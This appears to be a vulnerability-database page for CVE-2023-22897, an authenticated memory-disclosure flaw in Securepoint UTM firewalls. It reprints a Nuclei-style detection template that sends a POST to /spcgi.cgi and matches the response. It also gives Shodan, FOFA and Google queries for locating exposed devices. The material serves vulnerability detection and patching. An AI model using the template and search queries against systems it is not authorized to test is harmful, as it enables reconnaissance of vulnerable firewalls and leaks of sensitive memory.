CVE-2023-22897: Securepoint UTM - Leaking Remote Memory Contents

日期: 2025-08-01 | 影响软件: Securepoint UTM | POC: 已公开

漏洞描述

An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.

PoC代码[已公开]

id: CVE-2023-22897

info:
  name: Securepoint UTM - Leaking Remote Memory Contents
  author: DhiyaneshDK
  severity: medium
  description: |
    An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information stored in the device's memory.
  remediation: |
    Apply the latest security patches and updates provided by Securepoint to fix the memory leakage issue.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22897
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22897.txt
    - https://www.rcesecurity.com/2023/04/securepwn-part-2-leaking-remote-memory-contents-cve-2023-22897/
    - https://rcesecurity.com
    - https://github.com/MrTuxracer/advisories
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-22897
    cwe-id: CWE-908
    epss-score: 0.89675
    epss-percentile: 0.9954
    cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: securepoint
    product: unified_threat_management
    shodan-query:
      - title:"Securepoint UTM"
      - http.title:"securepoint utm"
    fofa-query: title="securepoint utm"
    google-query: intitle:"securepoint utm"
  tags: cve,cve2023,securepoint,utm,exposure,memory

http:
  - raw:
      - |
        POST /spcgi.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"sessionid":'
          - '"mode":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b1375e5693658ae829a580eb698a2e5f62ac2a87a290e0669dbcc21d3d3b5fc6022100b6a18979432d57b915f23915592b4135722b04031fb93d93470f38ca35fe3f7a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐